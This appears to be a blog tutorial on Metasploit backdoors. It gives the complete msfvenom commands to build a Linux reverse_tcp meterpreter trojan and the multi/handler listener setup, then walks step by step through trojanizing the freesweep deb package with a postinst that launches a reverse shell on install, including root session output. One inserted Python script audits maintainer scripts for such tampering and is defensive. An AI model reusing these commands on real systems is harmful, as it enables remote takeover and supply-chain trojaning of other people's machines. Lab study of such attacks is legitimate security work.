Metasploit Backdoor Attack Examples (5)

2022-10-25 10:40:53

1.1 Backdoor attack examples

1.1.1 Building a Linux backdoor to obtain a shell

1.1.1.1 Building the Linux trojan

# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -b "\x00" -f elf -o /var/www/html/backdoor

1.1.1.2 Starting the listener on Kali

msf6 > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run

1.1.1.3 Running the trojan on Linux (CentOS)

[root@test ~]# wget http://192.168.10.180/backdoor
[root@test ~]# chmod +x backdoor
[root@test ~]# nohup ./backdoor &

1.1.1.4 Running commands once the backdoor has connected

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.10.80
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > ls
Listing: /root
==============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100600/rw-------  13893  fil   2022-06-01 16:01:33 +0800  .bash_history
100644/rw-r--r--  18     fil   2013-12-29 10:26:31 +0800  .bash_logout
100644/rw-r--r--  176    fil   2013-12-29 10:26:31 +0800  .bash_profile
100644/rw-r--r--  176    fil   2013-12-29 10:26:31 +0800  .bashrc
100644/rw-r--r--  100    fil   2013-12-29 10:26:31 +0800  .cshrc
040755/rwxr-xr-x  37     dir   2021-12-14 10:44:29 +0800  .java
100600/rw-------  349    fil   2021-12-17 14:11:10 +0800  .mysql_history
040740/rwxr-----  19     dir   2021-11-16 10:41:42 +0800  .pki
040700/rwx------  25     dir   2021-12-14 13:23:17 +0800  .ssh
100644/rw-r--r--  129    fil   2013-12-29 10:26:31 +0800  .tcshrc
100600/rw-------  6982   fil   2022-05-12 10:36:28 +0800  .viminfo
100600/rw-------  1434   fil   2021-05-21 14:07:28 +0800  anaconda-ks.cfg
100755/rwxr-xr-x  295    fil   2022-06-07 17:05:55 +0800  backdoor
100644/rw-r--r--  27647  fil   2022-06-01 10:47:00 +0800  dnmap-0.6.zip
040755/rwxr-xr-x  199    dir   2022-06-01 15:02:43 +0800  dnmap-master
100644/rw-r--r--  23761  fil   2022-01-13 13:28:05 +0800  history.log

1.1.2 Injecting a backdoor into a deb package

1.1.2.1 Building the malicious deb package

  • Download and unpack the deb package

# apt install freesweep --download-only
# mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb ./
# dpkg -x freesweep_1.0.2-1_amd64.deb free

  • Generate the backdoor file

# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_sources

  • Create the packaging configuration files for the deb

# mkdir -p /root/free/DEBIAN
# cd /root/free/DEBIAN

# cat >> /root/free/DEBIAN/control <<'EOF'
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers ([email protected])
Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text- based terminals currently in use.
EOF

# cat >> /root/free/DEBIAN/postinst <<'EOF'
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF

# chmod 755 /root/free/DEBIAN/postinst

  • Repackage the deb file

# dpkg-deb --build /root/free/
# ll -h free.deb
-rw-r--r-- 1 root root 55K Jun  8 08:54 free.deb
# If this fails with: dpkg-deb: file `free.deb' contains ununderstood data member control.tar.xz  , giving up
# then build it with gzip compression instead: dpkg-deb -Z gzip --build ./free free.deb
# mv free.deb /var/www/html
# systemctl start apache2.service
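From the defender's side, the maintainer script above is what gives this package away: a postinst that uses sudo (dpkg already runs it as root), sets a setgid bit and backgrounds a binary the genuine package never shipped. The following audit script is an added example, not code from the original post; the sample postinst is the one shown above and the GENUINE_FILES list is a constructed, abbreviated stand-in for the real package's file list.

```python
import re
import shlex

# Constructed sample: the postinst that the walkthrough above injects into freesweep.
SAMPLE_POSTINST = """#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
"""

# Constructed, abbreviated file list of the genuine package. In practice take it
# from `dpkg-deb -c pkg.deb` and cross-check it against DEBIAN/md5sums in the package.
GENUINE_FILES = {"/usr/games/freesweep", "/usr/share/man/man6/freesweep.6.gz"}

# chmod with a setuid/setgid bit: 4-digit octal whose first digit is 2..7, or symbolic +s
SETID_CHMOD = re.compile(r"^chmod\s+(?:[2-7][0-7]{3}|\S*[+=]\S*s)\b")


def audit_postinst(script, shipped_files):
    """Return [(line_no, reason), ...] for suspicious statements in a maintainer script."""
    findings = []
    for no, raw in enumerate(script.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):          # skip the shebang and comments
            continue
        if line.startswith("sudo "):                  # dpkg already runs postinst as root
            findings.append((no, "uses sudo inside a maintainer script"))
            line = line[5:].strip()
        if line.endswith("&") and not line.endswith("&&"):
            findings.append((no, "backgrounds a process that outlives the install"))
            line = line[:-1].strip()
        if SETID_CHMOD.match(line):
            findings.append((no, "sets a setuid/setgid bit"))
        try:
            tokens = shlex.split(line)
        except ValueError:                            # unbalanced quotes: still report it
            findings.append((no, "unparseable shell line"))
            continue
        for tok in tokens:                            # absolute paths the package never ships
            if tok.startswith("/") and tok not in shipped_files:
                findings.append((no, f"references {tok}, which the package does not ship"))
    return findings


if __name__ == "__main__":
    for no, reason in audit_postinst(SAMPLE_POSTINST, GENUINE_FILES):
        print(f"postinst:{no}: {reason}")
```

Run it against `dpkg-deb -e pkg.deb dir` output before installing any package fetched from outside the distribution's repositories; the absolute-path rule needs an allowlist for system tools (update-menus, ldconfig and the like) in real use.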

1.1.2.2 Starting the msf listener

# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit -j

1.1.2.3 Installing the deb on the client

msfadmin@metasploitable:~$ wget http://192.168.10.180/free.deb
msfadmin@metasploitable:~$ sudo dpkg -i free.deb

1.1.2.4 Checking the connection and gathering server information

msf6 exploit(multi/handler) > sessions

msf6 exploit(multi/handler) > sessions -i 5
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/
background

Background session 5? [y/N]  y

liyang